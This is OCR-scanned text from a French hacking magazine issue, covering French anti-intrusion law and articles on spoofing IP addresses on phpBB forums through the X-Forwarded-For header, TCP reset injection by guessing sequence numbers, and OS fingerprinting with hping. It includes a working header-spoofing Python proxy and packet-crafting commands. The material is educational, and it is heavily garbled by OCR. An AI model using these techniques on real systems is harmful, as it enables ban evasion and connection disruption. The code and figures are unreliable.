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The Hackademy Feedback 


a nouveauté, dans ce numéro, ne réside pas uniquement 
dans le contenu, avec les techniques php originales que | PL4 + SMART sPOOFING 

ous fait connaître frogm@n et la méthode inédite d'e- 

zekiel pour exploiter les heap format bugs sur Linux. Ce n'est | P'L8 + Qui SONT LES iNTRUS pu Ner ? 
pas non plus la nouvelle maquette, plus colorée, qui fait une ré. | 
elle différence. Ce que nous Inaugurons avec ce Manuel #9, | P22 + NOUVELLES ATTAQUES SUR 


c'est un prolongement vivant de nos publications sur le Web, PHP/MySQL 
avec une nouvelle section de notre site qui permet de donner 
une suite interactive à nos articles. P28 - SUPER GLOBALS 


The Hackademy Feedback se présente comme un mini forum 
ouvert pour chaque texte, où vous êtes invités à poster vos P32 + HEAP OVERFLOWS LINUX 

commentaires, questions et corrections. Il est fréquent que À 

nous pensions, après coup, à une information ou un len que | P36 * HEAP OVERFLOWS BSD 

nous aurions pu ajouter à nos articles. Souvent, c'est vous, + 
lecteurs, qui signalez une erreur où apportez un complément. | P40 + FORMAT BUGS DANS LE TaS 

Nous voulons, avec cet outil, centraliser ces contributions. 
Nous pensons aussi que, de cette manière, nous pourrons | P48 + CONTRÔLE TOTAL SUR LES APPLICATIONS MS 
mieux répondre à vos attentes, au-delà du papier. Vous pourrez di 
ainsi directement donner votre avis sur les sujets que nous P54 + CONSTRUISEZ VOTRE MICRO ORDINATEUR : 
traitons, et nous en suggérer d'autres. Nous mettrons aussi NGBasic 

régulièrement en place des sondages qui, s'ils sont représen- 
tatifs, nous permettront de mieux vous connaître, et donc de 


MÉVas coter P59 «THE HACKADEMY CHALLENGE 
Pour commencer : Voudriez vous que nous parlions davantage 
ou moins fréquemment de Linux dans le Manuel ? P63 + CLASSEMENT 


À vous, sur : htip://lecdback.thehackademy.net 


P64 - Voix DE LA COMMUNAUTÉ 


“L'accès et le maintien frauduleux total ou partiel dans tout ou partie d’un système ou délit d’intrusion est 
puni par l'article 323-1 d’1 an d'emprisonnement, et de 100 000 francs d'amende ”. 


E' France, l'arme principale l'utilisation d'un code d'accès rédaction de la loi. Cette disposi- 


de l'arsenal juridique exact, mais par une personne tion vise aussi la propagation de 

disponible contre les hac- non autorisée à l'utiliser. virus informatique. 
kers demeure la loi Godfrain du La loi prévoit aussi que si l'accès Il faut savoir que la Simple tentati- 
5 janvier 1988 « relative à la ou le maintien frauduleux dans le ve, non suivie de réussie donc, est 
fraude informatique ». Ce texte système entraîne la suppression _ punie des mêmes peines. En cute, 
prévoir notamment que « l'accès ou la modification de données, ou les personnes physiques coupables 
et le maintien frauduleux total même une simple altération, d'un de ces délits encourent, on 
ou partiel dans tout ou partie même involontaire ou par plus de la peine principale, des pei- 
d'un système ou délt d'intrusion | maladresse, les peines sont dou- nes complémentaires énuméréss 
est puni par l'article 323-1 d'un blées. Lorsque l'action est vo-  àl'artcie 323-5. 
an d'emprisonnement et de lontaire, l'article 323-2 prévoit3 Les personnes morales, comme 
100 000 francs d'amende» Ce ans d'emprisonnement et les entreprises ou les associa- 
délit est constitué dès lors que 300 000 francs d'amende. Là tions, peuvent, elles aussi, être 
n'importe quelle technique est encore, la loi texte vise tous les déclarées responsables pénale- 
employée pour accéder fraudu- procédés et toutes les tech- ment et encourent les peines 
leusement à un système proté- niques utilisés, mâme celles in- prévues à l'article 131-309 du 
gé. I l'est aussi dans le cas de connues au moment de la nouveau Code pénal. 
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2 
Spoofer son IP 
sur les forums 


BY DVRASP 


Un problème, lié aux en-têtes 
http et présent sur de 
nombreuses applications web, 
permet à un utilisateur de 
falsifier son adresse IP 


apparente, notamment sur les 
forums utilisant phpBB. Nous 
présentons, dans cet article, un 
moyen simple pour manipuler 
les requêtes http permettant, 
entre autres, de vérifier ce bug. 


On y discute aussi des 
difficultés soulevées par les 
solutions possibles. 


NIVEAU 
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Guest [1 Post] 


Installer Twisted Python sur Windows 


Pour installer Python sur Windows, il faut aller sur htpy/pythonorg/dountond ot 
télécharger le Windows installer. En l'exécutent, on obtient une installateur 
Standard. Il n'est pas nécessaire de modifier les réglages par défaut. 
L'installation comprend l'interpréteur et les bibliothèques de base, ainsi qu'un en- 
vironnement de programmétion ; Idle. On peut le lancer depuis le menu démarrer. 
Tisted Python est disponible à l'adresse suivento : hip/Amatistedmanti.com/pro- 
duets/twisted/dhunioad. Twisted utilise les bibliothèques génériques de Python (s0c- 
Ket, etc.), sauf pour les protocoles cryptographiques. Il est donc nécessaire 
d'installer les prérequis PyOpenSSL et PyCrypto, qui sont disponibles sur cette 
même page (sous la forme de Windows installer épalement). 

Un fois tout cela installé, il suffit, pour utiliser le script d'exemple de cet article, 
‘de double-cliquer sur le fichier .oy, ou de l'ouvrir avec Idle et de l'exécuter (F5). 
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Spoofer son IP sur les forums 


La première idée qui vient à 
l'esprit, si l'on veut dissimuler son 
adresse IP sur un forum ou un site du 
Web, est bien entendu d'utiliser un 
proxy anonyme. Google permet de 
trouver de nombreuses Listes, plus ou 
moins à jour, de proxys http accessi- 
bles au public - volontairement ou non. 
En configurant son navigateur pour 
passer par cette passerelle, on cache 
ainsi son identité derrière l'IP du 
serveur utilisé. Il existe différents 
types de proxys http, que l'on peut 
catégoriser en fonction des en-têtes 
qu'ils ajoutent, qu'ils suppriment ou 
qu'ils modifient. Par exemple, certains 
proxys, particulièrement prisés par les 
surfeurs anonymes, suppriment tous 
les en-têtes à l'exception du strict 
minimum (Host, et ceux relatifs aux 
formulaires). D'autres, au contraire, 


fournissent l'adresse du client à l'ori- | 


gine de la requête, dans un en-tête 
qu'ils rajoutent : X-Forwarded-For. 


Le problème 


Cet en-tête spécial n'est pas docu- 
menté dans un REC. Il à été introdtfit 
par les développeurs de Squid, une 
implémentation libre de proxy http. 
Cette convention est cependant suivie 
par beaucoup d'autres logiciels. De 
nombreux moteurs de sites web, de 
forums, ete. utilisent cette information 
pour différencier les utilisateurs pas- 
sant par un même proxy (par exemple 
les clients d'un même fournisseur 
d'accès, comme AOL). C'est ici que 
réside le problème : rien n'indique que 
la connexion http provient effective 
ment d'un serveur proxy. On ne peut 


donc pas faire confiance à cet en-tête, | 


puisque n'importe qui pourrait 
prétendre être un serveur proxy et 
fournir n'importe quelle adresse de 
client. 

Par exemple, phpBB utilise 
l'adresse donnée par X-Forwarded-For 
pour ses logs (voir illustration) et pour 
Ja gestion des utilisateurs bannis. Voici 
comment ça se passe dans le code (les 
commentaires sont de moi) : 


4fC getenv("HTTP X_FORMARDED_FOR') L= ‘* ) £ 
Sclient_ip = // [....] adresse réele de la connexion 


// à partir de REMOTE_ADDR 


{/ ll peuty avoir plusieurs adresses, s les pros 


// Sont chaïnés. Elles sont alors séparées par des virgules. 
fentries = explode(,!, getenv( "HTTP X_FORMARDED FOR')); 


reset(Sentries) ; 


while (1ist(, $entry) = each(fentries)) { 


Sentry = trin(sentry); 
// Une vraie adresse IP ? 


Àf Cprea match("/"([9-9H\.[8-97\. [8-9J4\.[0-27+)/", 


$entry, #ip_list) ) { 

{/.On supprime les adresses locales. 
fprivate ip 
‘/"192\.168\..*/", 


/A172N .((LL6-9]) | (208-91) 1(ACB-17)N. #7, 

DST TRR7E 7 VAE /TR 

#found_ip = preg replace(#private_ip, $client 1p, 
#tp_Hist1l); 


{1 On s'arrète donc dès la première adresse 
{/ non locale et différente de l'adresse réelle. 


if (Aclient_ip L= Sfound_p) { 
$ctient ip = $found_ip; 
break; 
} 
ñ 
} 
} else { // Pas d'en-téte X-Forwarded-For. 
4/1] On prend l'adresse réelle. 
} 


Il est intéressant d'observer que 
cette partie du code est assez com- 
plexe. Elle a sans doute été corrigée 
suite à des problèmes survenant avec 
certains proxys d'intranet. 


Manipuler les en-tête avec Python 


Nous avons découvert la bibliothèque 
Twisted dans THJ 13, qui nous avait 
permis de fabriquer rapidement un faux 
serveur socks, C'est encore plus simple 
d'écrire un proxy http qui modifie pour 
nous les en-têtes que le navigateur trans- 
met au serveur. Voir l'encadré pour le 
code source, Ce programme ouvre le port 
8080 en local. Il faut donc configurer son 
navigateur pour qu'il utilise le proxy 
M//localhos:8)60. 

Il faut voir dans le listing que l'on 
crée une sous-classe de Proxy, 
HeaderEditor, qui intercepte les en- 
têtes avant qu'ils ne soient envoyés 
au serveur. Deux dictionnaires, 
ForcedHeaders et FilteredHeaders 
Patterns, déterminent si l'on 
va conserver, modifier ou 
supprimer un en-tête, en fonc- 
tion de son nom, Par exemple, 
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array('/9\./', /A127\.8\.0\.1/", 


la sous-classe 
CookieEater sup- 
prime les cookies 
qui contiennent 
le mot "track! et 
les User-Agent et 
Referer quels 
qu'ils soient (à 
cause None). 
L'autre sous-clas- 
se, MyIPSpoofer, 
permet d'ajouter 
| systématique- 
ment un X-For- 
warded-For avec 
la valeur spéci- 
fiée, Ainsi, on 
peut choisir son 
IP lorsque l'on 
ite un forum 
phpBB ;> 


DZ: LE 


Un problème insoluble ? 


On aurait tort de blâmer les 
auteurs de phpBB pour ce problème. 
Il s'agit, comme souvent, d'un com- 
promis entre sécurité et confort. 
Comme on l'a dit, l'adresse spoofable 
ne sert que dans Les logs internes du 
forum (que les administrateurs consul. 
tent pour repérer les clones, par exem- 
ple) et pour bannir des utilisateurs, 
Dans le premier cas, il ne faut pas 
oublier que l'adresse réelle de la 


| connexion http (proxy, client normal, 


ou client se faisant passer pour un 
proxy) figure bel et bien dans les logs 
du serveur web, En cas d'abus, la 
modification des en-têtes ne protège 
donc en rien un trouble-fête. De plus, 
il est encore plus simple, pour rester 
anonyme, de passer par un proxy 
public, comme on en parlait au début 
de cet article. Par contre, pour esqui- 
ver des bans successifs, il est peut-être 
plus difficile de trouver à chaque fois 
un nouveau proxy. 

Mais le dilemme est le suivant : on 
ne peut pas ignorer le contenu de 
X:Forwarded-For, notamment à cause 
des FAI qui utilisent des proxys http 
transparents. Cela poserait d'avantage 
de problèmes. On ne peut pas non plus 
faire confiance à ces données. Une 
solution efficace serait de n'en tenir 
compte que lorsque cet en-tête 
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Proxy http personnalisé en Python 


fron tuisted. internet import reactor, protocol 
fron Enisted.protocols import http 

fron tuisted.web.proxy import Proxy 

from string import strip 

fron re import compile as regexpcompi le 


class HeaderEditan( Proxy): 
Forcedeaders = {} 
FilteredeadensPatterns = {} 


def canPassHeader(self, line): 
headername, value = map(strip, line.split(":",1)) 
if self. ForcedHeaders. has_key(headernane) : 
return 4 
try: 
regexp = seïf.FilteredHeaderspatterns[headernane] 
if regexp is None: return 4 
return not regexp.match(value) 
except KeyError: 
return 1 


def headerReceived(self, line): 
print "P<-C:!, 1e 
if self.canPassHeader(line): 
self.pessheeden(Tine) 


def ällHeadersReceived(se1f): 
for headername, value in self.Forcedilenders. items(): 
self.passHeader('%s: %s" % (headername, value)) 
Froxy .al 1Header sReceived( sel f) 
pass 


def passheader(self, line): 
print ‘P->5:!, line 
Proxy .headerReceived(self, line) 


class CookieEater(HeacerEditor): 
FilteredileadersPatterns = { 
'Cookie": regexpcompi lel".*track. #1), 
“User-Agent": None, 
‘Referer": Nore 
} 


class MyIPSpoofer(HeaderEditor): 
Forcedieaders = { 
"X-Forwarded-For": "123,124,125,126" 
} 


f = http.HTTPFactony() 

Fiprotocol = MyIPSpaoter 

reactor. listenTCP(BA8R, f, interface: 
reactor. run() 


"127,8.0.1") 


Disponible en téléchargement sur notre site Interne 


provient d'une sourée réputée fiable (en utilisant une 
white list contenant des proxys de FAT vérifiés), Une 
autre possibilité, plus lourde à mettre en œuvre, serait 
d'enregistrer les deux adresses, 


Autres utilisations du programme 


Le fait de pouvoir modifier les en-têtes http permet 
d'autres applications. 


Protection de la vie privée 


Le programme affiche tous les en-têtes envoyés par le 
navigateur (le préfixe P<-C indique les communications 
du client au proxy). On peut ainsi détecter les indiscré- 
tions de son navigateur, Comme le suggère la classe 
d'exemple CookieEater, on peut facilement bloquer 
l'envoi de certaines informations. 


Déboguage et XSS 


Le fait de pouvoir manipuler la négociation http avec le 
serveur peut permettre au développeur de vérifier le fonc- 
tionnement de son site dans des conditions spéciales, En par- 
ticulier, il est courant de trouver des failles de cross site 
scripting permanent dans du code qui tient compte d'infor- 
mations contenues dans les en-têtes, sans filtrage. Dans le 
code de phpBB que l'on a cité plus haut, les précautions 
nécessaires sont prises (avec le preg_ match). Sans cela, un 
administrateur risquerait d'exécuter du javascript à son insu 
en consultant les logs. De même, les statistiques d'un site 
web, qui tiendraient compte du champ Referer ou du Host 
donné, sont aussi sujettes à ce problème. 


User-Agent et google cloaking 


Enfin, il peut être intéressant de maquiller son User- 
Agent. En effet, il existe encore des sites qui réagissent 
différemment en fonction du navigateur annoncé. 
Certains interdisent simplement l'accès aux navigateurs 
prétendument incompatibles. Sur d'autres sites, la 
discrimination va jusqu'à modifier le code html - on 
pourra vérifier les rumeurs qui disent que microsoft.com 
est volontairement dégradé lorsqu'on ne le consulte pas 
depuis Internet Explorer où même le contenu. Certains 
sites, par exemple, tentent de tromper les moteurs de 
recherche : voir la technique du google cloaking 
présentée dans THJ 14. 

Moteurs de forum ayant le même problème : IconBoard, 
punBB et probablement d'autres. 

Thread bugtrag : 

Htp://securtyfoeus.com/archive/1/361719/2004-04-25/2004-05-01/1 


N'hésitez pas 
modifiées du 
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Blind spoofing revisited 


Casser la connexion TCP d'un autre 


Un défaut important dans TCP/IP mis en évidence publiquement ces dernières 
semaines sur les listes de sécurité, rend à nouveau praticable plusieurs attaques que 


l'on pensait révolues, à 


actuels. 


Lorsque l'on parle de blind spoo- 
fing, on pense surtout à cette attaque 
sur tephp qui consiste à initialiser une 
connexion tcp complète (syn/ack + 
données) vers une machine distante, 
en faussant l'adresse source. Cette 
manipulation nécessite de prédire le 
numéro de séquence fourni par Le des- 
tinataire, que la source est sensée 
répéter. Ce numéro sert à la foi à assu- 
rer la bonne suite des packets (qui 
n'arrivent pas forcément dans l'ordre), 
et justement à empêcher ce genre d'u- 
surpation. Cette attaque permet de 
contourner les protections qui utili- 
sent l'adresse source comme authen- 
tification (voir l'article sur le smart 
spoofing, page 16, pour une autre 
approche similaire). 

Cependant, si on parvient à prédi- 
re les numéros de séquence issus 
d'une victime, on peut réaliser deux 
autres prouesses : insérer des données 
dans une connexion existante (rajou- 
ter des commandes dans une session 
Telnet, par exemple) et fermer arbi- 
trairement une connexion existante, 
en envoyant un paquet avec le flag 
RST et le bon numéro. 


La difficulté de ces attaques vient 
du fait que le numéro de séquence 
initial, sur la plupart des OS actuels, est 
choisi aléatoirement. Ce numéro étant 
codé sur 4 octects, le nombre de possi- 
bilités s'élève à plus de 4 milliards. Male 


gré certaines techniques pour limiter le | 


nombre de candidats{1], une attaque 
brute force, dans l'espoir de tomber 
sur le bon numéro, demanderait d'en: 
voyer des milliards de paquets et 
prendrait un temps irréaliste, même 
avec une grosse connexion. 


Pourtant, on s'est aperçu [2] qu'un 
facteur avait été négligé et qu'il est 
capital pour les deux derniers types 
d'attaques cités plus haut. En effet, la 
validité d'un numéro de séquence 
dans une connexion déjà établie 
dépend de la taille de la fenêtre tcp 
(window). 

Prenons par exemple une 
connexion IRC existante, comme on le 
voit dans le dump suivant. 


# topdump -n5 port 6667 
21:57:23 213.41.84.205.6667 
> 81.50.197.196.32818: P 
2368700680 : 3368792137 (1457) 
ack 4248898559 win 4996 (DF) 
21:57:23 81.59.197.196.32818 
> 213.41.84.265.666: 
ack 3368702137 win 20449 (D) 


On voit, en gras, le port source de 
Ja connexion et le numéro de séquen- 
ce envoyé par le serveur. On note la 
taille de la fenêtre qui est de 4096. 

Essayons d'envoyer un paquet avec 
le flag RST, à l'aide d'un outil de dia- 
gnostique de Cisco [3]. On prend soin 
de donner un numéro de séquence 
légèrement supérieur au numéro reçu, 
mais contenu dans la fenêtre. 


# ./ttt -S 81.50.197.196 -x 32818 \ 
-D 219.41.84.205 -y 6667 \ 
-.rst -s ‘expr 4248808558 + 4980 \ 
-W 13117 


One voit apparaître dans le dump 
(la valeur win ne sert qu'à reconnaît: 
re le paquet, ici) 
57:54 81.58.197.196.32818 

> 213.41.84.205.6667: R 
4248902559:4248992552(@) win 13117 
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cause des difficultés que l'on rencontre à prédire les 
numéros de séquence sur les systèmes d'exploitation 


Depuis le client ire, on effectue un 
Ipine : 


21:57:68 81.59.107. 106.32 
> 213.41.84.205, 6667: P 
A2AB608550 :1248808692(42) 
ack 3368762137 win 24449 (DF) 
Le serveur répond en disant que 1à 
connexion n'existe plus 1 
21:57:58 213.41.84.205.5667 
> 8L.56.197.196,32818: R 
3368702137:3368782137(4) win D (DF) 


Comme la taille de la fenêtre, 
selon le système, peut être assez éle- 
vée (jusqu'à plus de 30000), les chan- 
ces de tomber sur le bon numéro de 
séquence sont multipliées d'autant. Le 
nombre de paquets à envoyer pour 
faire une brute force exhaustive, 
même si le port source est inconnu, est 
ainsi réduit à un nombre raisonnable, 
Il es donc envisageable de couper une 
connexion tep à distance, c’est une 
affaire de minutes. Ce défaut est par- 
ticulièrement dangereux parce que 
certains routeurs communiquent en 
utilisant le protocole bep encapsulé 
dans tcp. 
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à distance 


L'identification du système 
d'exploitation d'une machine 
distante est une technique 
importante dans la hiérarchie 
d'une attaque. C'est aussi un 
outil intéressant pour 
l'administrateur qui essaye d'en 
savoir plus sur l'assaillant, ou 
pour diagnostiquer un bug sur le 
réseau, Dans cet article, nous 
détaillerons ces techniques avec 
un programme en Perl, et 
présenterons quelques outils 
existants. 


Plan 


2 
Détection d'OS 


BY DELETE 


La détection d'OS est utile à 
diverses tâches, qui vont de l'op- 
timisation d'un réseau hétérogè- 
ne à la planification d'une 


attaque. Nous détaillerons dans 
cet article quelques méthodes 
permettant de réaliser cette 
prise d'empreintes. [...] 


Rappels sur TCP/IP. 


Les différences entre systèmes d'exploitation viennent du fait 
qu'ils n'utillsent pas ls même pile TCP/IP (comprendre : implé- 
mentation du protocole et de la gestion des paquets). Avant de 
décrire les méthodes de prise d'empreintes, un petit rappel des 
protocoles utilisés est indispensable. 


Les schémas suivants sont extraits des RFC (Requests for 
Comments) 791 et 798 présentant respectivement les protocoles 
IP et TCR 


a LE ES TE EL 
[ TGenNcaLon Fes | armee 
Time To Le Protocol CRC d'enêle 
Adresse IP source 
Adresse 1P destination 
Gpiions IP. F on 
Port source Por destination 


1. Méthodes simples mais efficaces 
2. Prise d'empreintes active 
Méthodologie 
Messages entraînant des réponses différentes. 
Mise en œuvre pratique en Perl 
Outils existants 
3. Prise d'empreintes passive 
4, Prévention et protection, 
5, Conclusion 


urrage 


Données TCP. 


Gomme vous le voyez, ces deux protocoles contiennent un grand 
nombre de champs qui peuvent évidemment avoir beaucoup de 
valeurs différentes. Ce sont ces champs qui nous serviront dans 
notre détection. En effet, les développeurs de chaque système 
d'exploitation n'ont pas programmé la même pile TCP/IP et ils ne 
respectent pas toujours toutes les normes décrites dans les RFC, 
ce qui entraîne des réponses diverses par rapport à des envois de 
données bien spécifiques, et des Valeurs par défaut différentes. On 
peut par exemple différencier les ttl ou les mss par défaut. Il est 
important de garder un œil Sur ces schémas pour une compréhen- 
sion optimale des explications de l'article. 


Le protocole UDP n'est pas utilisé dans les techniques présentées 
dans cet artiole. le ne pense pas qu'il soit nécessaire de montrer 


ses particularités, 
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es 
ite 


Méthodes simples mais 
efficaces 

Avant de se lancer dans la 
prise d'empreintes de la pile, il 
faut se rendre compte qu'il n'est 
pas forcément utile d'effectuer 
toute une série de tests complexes 
alors que l'on peut avoir toutes les 
informations nécessaires en récu- 
pérant les bannières des services 
tournant sur la machine cible. 


tres de leur pile IP. Nous allons 
voir à présent quelques exem- 
ples de messages entraînant des 
différences à partir des protoco- 
les TCP, IP et ICMP. 


Méthodologie 

Notre prise d'empreintes est 
une technique qui va consister à 
écouter et interpréter la réponse 
que va donner la machine dont 


la réponse de B, 

-Machine B : répond à À 
selon la norme suivie par 
son système d'exploitation, 

- Machine A : reçoit et inter- 
prète la réponse émise par B. 

Vous le voyez, c’est simple 

dans le principe mais lorsqu'il 
s'agit de gérer un grand nombre 
de requêtes différentes, ça se 
complique très vite. 


Étudions donc la réponse d'un 
serveur ftp configuré par défaut : 


Eroot@localhost root}# nc localhost 21 
229 ProFTPD 1.2.9 Server (Server Perso) [localhost] 


SYST 
215 UNIX Type: LE 


Plutôt concluant, non ? Nous 
n'avons pas eu besoin de connai. 
tre un utilisateur particulier et 
nous savons à présent que la 
machine cible tourne sur une 
plate-forme UNIX, ou un envi- 
ronnement similaire. Les ser- 
veurs trop " bavards " sont très 
fréquents, et cela résulte d'une 
configuration peu prudente. Il 
arrive parfois que l'on obtienne 
la version précise de l'OS 
(noyau), voire de la distribution 
exacte (par recoupement, en exa- 
minant les informations de dif- 
férents services, par exemple). 


Pour récupérer les bannières | 


automatiquement, vous pouvez 
utiliser nmap, qui propose dans 
sa dernière version l'option -A, 
qui affiche la bannière sur la sor- 
tie du scan, Voilà | Maintenant 
que les rappels sont terminés, 
nous allons pouvoir passer à la 
partie plus technique. 


Prise d'empreintes active 


La prise d'empreintes de pile 
active est la méthode la plus uti- 
lisée dans les utilitaires de 
recensement. Elle nécessite que 
le système cible ait conservé une 
partie de sa configuration réseau 
d'origine et que les personnes 
l'utilisant ne se soient pas 
amusées à modifier les paramè- 


on souhaite identifier le système 
d'exploitation par rapport à un 
paquet forgé entraînant diverses 
réponses selon les OS. L'ordre de 
l'analyse se résume donc ainsi : 
- Machine À : envoie un 
paquet forgé à B puis attend 


Messages entraînant des réponses 
différentes 


Voyons à présent quels sont 
ces fameux paquets ainsi que la 
réponse qu'ils entraînent selon 
les systèmes d'exploitation. 


© Test FIN 


L'envoi d'un paquet avec Le flag FIN (schéma du protocole TCP) sur un port ouvert 
entraine - ou devrait entraîner - une absence de réponse. Mais des systèmes tels 
que Windows répondent à celui-ci par ACK+RST. Afin de vérifier cela par vous- 
mêmes, vous pouvez utiliser hping : 


Croot@localhost rootJ# hping -c 1 -F windows -p 135 

HPING windows Ceth@ 192.168.9.108): F set, 48 headers + 6 data bytes 
len=46 ip=192.168.9.198 tt1=128 1d=5535 sport=135 flags=RA seq=f win=2 rtl 
=-- windows hping stetistic --- 

1 packets tramitted, 1 packets received, 2% packet loss 


Alors que pour Linux, on obtient : 


Croot@localnost rootJ# hping -c 1 -F localhost -p 21 

HPING localhost (lo 127.8.9,1): F set, 49 headers + @ data bytes 
--- localhost hping statistic --- 

1 packets tramitted, 8 packets received, 1298 packet 1oss 


J'ai également réalisé ce test sur freebsd et netbsd. Leur réponse a été la même 
que pour Linux, c'est-à-dire pas de réponse :). 


© TIME TO LIVE PAR DEFAULT (TTL) 

Une autre technique consiste à considérer le ttl contenu dans l'entête IP. Ce test 
doit être réalisé en ICMP, TCP ou UDP car certains OS ne répondent pas de la même 
façon selon le protocole utilisé. Par exemple, la version 3.0 d'openbsd renvoie 255 en 
UDP et ICMP alors qu'elle renvoie 128 en TCE. Pour effectuer ce test en icmp, il suf. 
fit d'utiliser la commande ping : 


Croot@localhost rootj# ping -c 1 windows 
PING windows (192.168.9,190) 56(84) bytes of data. 
64 bytes from windows (192.168.9.194): icnp_seq=1 


=128 tine=4.68 ms 
De même, pour Linux on obtient : 
Croot@localhost root}#t ping -c 1 localhost 


PING localhost (127.9.9.1) 56(84) bytes of data. 
64 bytes from localhost (127.9.6.1): icmp_seq=1 tt1=64 tine=£.077 ms 
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Dans les tests que nous 
venons d'effoctuer, les machines 
sont situées sur le même réseau 
local et les paquets sont transmis 
directement d'une machine à 
l'autre, Sur Internet, la situation 
est différente et à chaque fois 
qu'un paquet traverse un rou- 
teur (hop) le ttl est décrémenté 
de 1. On ne retrouve donc pas les 
valeurs par défaut du système 
que l'on recherche, On peut 
cependant estimer le nombre 
moyen de hops qu'il y a jusqu'à 
la machine cible avec un outils 
comme traceroute, par exemple, 

On sait aussi qu'il n'y aura 
pas plus de 30 hops avant que 
notre paquet arrive à destina- 
tion. On peut donc estimer la 
valeur par défaut qui a été émise 
par la machine distante au 
moment de sa réponse. 


selon les systèmes. Elle cor- 
respond en effet à la taille maxi- 
male des données TCP contenues 
dans un segment (Maximum 
Segment Size), et dépend donc 
de la taille du buffer de réas- 
semblage des paquets, On l'ob- 
tient à l'aide de tepdump à la 
suite de l'envoi d'une requête 
avec hping (hping -c 1-S windows 
-p 135, où 135 correspond à un 
port ouvert). La réponse sniffée 
dans tepdump serait pour Win- 
dows équivalente à : 


17:54:17.604984 1P Windows. 135 > 
192.168.9.104.2570: S 471419663:471419653(8) ack 
2136700473 win 16616 <mss 1460> 


Illustrons ce principe en faisant un ping sur google : 


[rootélocalhost root}# ping -c 1 ww.google.fr 


PING wm.google.akadns.net (66.192.7.99) 55(84) bytes of data. 


64 bytes fron 66.182.7.99: icmp_seg=1l tt1=249 time=312 ms 


rfc 1700. Trois d'entre elles sont 
obligatoires (MSS, End of options 
et No operation). Comme l'ex- 
plique Fyodor dans son papier 
paru dans phrack 54, par leur 
nombre important, ces options 
sont une source d'informations 
très précieuse dans la détection 
de système d'exploitation, En 
effet, la première chose à penser 
est qu'elles ne sont pas toutes 
obligatoirement implémentées 
dans une pile IP. On peut donc 
vérifier leur présence pour 
chaque système d'exploitation, 
Quand ces options sont bien pri- 
ses en compte, on peut également 
vérifier leurs valeurs. Ainsi, il suf. 
fit d'envoyer un paquet contenant 
une ou plusicurs de ces options, 
et de comparer le résultat. 


© TAILLE DE FENÊTRE 


Le paramètre window du protocol 
“CP est très utile pourune prise d'em- 
preintes distantes, car la REC ne pré 
cise pas de valeur à respecter Il y a 
‘beaucoup de différence entre chaque 


Ici, Le til est de 240, ce qui 
laisse penser que la valeur ori- 
ginelle était de 255.255-30=225. 
On peut donc estimer que toutes 
les réponses comprises entre 225 
et 255 ont été émises par une 
machine ayant un tt par défaut 
proche ou égal à 255. 


Valeur par défaut 


Approximation 


Linux 
Windows 2k 98-128 
Freebsd 34-64 
Openbsd 225-265 


Valeurs des tti icmp par défaut de quelques systèmes 


© VaLeur ou mss 


Quand on envoie un paquet 
avec le flag SYN activé, on 
obtient en retour un message 
contenant une valeur mss variant 
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système. On peut connaître la valeur 
du champ window d'un système en 
envoyant un paquet avec le flag SYN 
pour commencer une connexion : la 
machine cible répondra alors avec la 
taille de fenêtre qu'il soubaite utiliser. 
Pour voir cette valeur, on peut utiliser 
hping en faisant : 


Croot@lacalhost os_detect # hping -c 1 -S -p 21 localhost 
HPING localhost (lo 127.0.9.1): S set, 49 headers + 9 data bytes 
ler=44 ip=127.0.9.1 tt1=64 DF id=8 sport=21 \ 

flags=5A seg=ÿ win=32767 rtt=9.2 ms 


© Orrions TCP 


Il existe un grand nombre 
d'options TCP décrites dans la 


Cum | 77 | 
Lindon 2 [rose 
Crbndst [5 


Valeurs de la taille de fenêtre par défaut pour quelques systèmes 
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© TAILLES DES ERREURS ICMP 


Le protocole ICMP (internet 
control message protocol) est uti- 
lisé pour la gestion des erreurs 
liées au protocole IP. 

Normalement, les messages 
d'erreurs ICMP doivent contenir 
un en-tête IP, un en-tête ICMP et 
une partie des données du data- 
gramme qui a provoqué l'erreur. 
D'après la RFC 792, seulement 
64 bits du message original doi- 
vent être insérés dans le messa- 
ge d'erreur ICMP, mais cette 
valeur a dû paraître trop petite 
pour les programmeurs d'OS, car 
la taille des données qu'ils y 
insèrent varie beaucoup d'un 
système à l'autre. 


© Camps TOS 


D'après la RFC ICMP la valeur 
du champ TOS (Type Of Service) 
doit toujours être à 0. Mais si l'on 
envoie un paquet avec une valeur 
différente de 0, on peut observer en 
retour deux réponses différentes, 
Soit la machine cible répond en 
conservant la valeur du champ'TOS, 
soit elle remet celle-ci à 0. On peut 
utiliser cette méthode pour diffé- 
rencier Linux et Windows. Utilisons 
hping et tcpdump pour vérifier cela. 


de 8 est conservée : 


Eroot@localhost root}# tepdump icnp -1 10 
tcpdump: Tistening on lo, Tink-type ENIGMB (Ethernet), \ 


capture size 96 bytes 
22:23:63.972946 1P (tos Px8, tt1 
flags none], length: 28) \ 


localhost > localhost: icmp 8: echo request seq 4 
64, id 54493, offset 0, \ 


22:23:53.973914 IP (tos OxB, ttl 
flags [none], Tength: 28) \ 


localhost > Tocalhost: imp 8: echo reply seq 


Il existe un grand nombre 
d'autres options que l'on peut 
vérifier, telles que l'IP ID ou 
bien la présence du bit DF. On 
peut même s'intéresser au 
protocole ARP ou interroger 
LPD pour récupérer des infor- 
mations. Enfin, les méthodes 
d'application à la prise 
d'empreintes des systèmes d'ex- 
ploitation est très vaste et l'on 
peut imaginer que bientôt, peut 
être, il y aura de nouvelles 
façons de faire utilisant 
d'autres protocoles. 


Mise en œuvre pratique 

Dans un but didactique, nous 
allons en quelque sorte réinventer 
la roue, pour mieux assimiler les 
principes expliqués tout au long de 
l'article et comprendre le fonction- 


L'option -0 de hping permet d'initialiser la veleur du 


TOS. On peut donc lancer : 


hping£ -1 -o 8 windons -c 1 et tcpdum 
On observe le paquet et sa réponse : 


Lroot&localhost rootl# tepdump icmp -v 
tepdump: listening on ethÿ, Tink-type ENIGMB (Ethernet), \ 


capture size 96 bytes 
22:15:19.292008 IP Ctos Gx8, tt 
flags Cnone], length: 28) \ 


192.168.0.184 > windows: icmp 8: echo request seq 
:19.204505 IP (tos Bx8, tt1 128, 1d 58709, offset 9, \ 


22:1 
flags [none], length: 28) \ 


windons > 192.168.9.194: icmp 8: echo reply seq ÿ 


On voit ici que Windows 
réinitialise le champ TOS à 
0. En revanche, après avoir 
lancé la même commande 
vers Linux, la valeur TOS 


64, id 53814, offset 0, \ 
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64, id 59313, offset 9, \ 


nement des utilitaires 
déjà existants. Le pro- 
gramme perl ci-dessous 
est très simple dans les 
tests qu'il effectue, mais 
il illustre bien le principe 
expliqué dans la métho- 
dologie. II est seulement 
capable de différencier 
les machines Linux, Win- 
dows et freebsd. 


#\/usr/bin/perl 


##éttttt Imports 

use strict; 

use Net::RauP; # envoi de paquets 
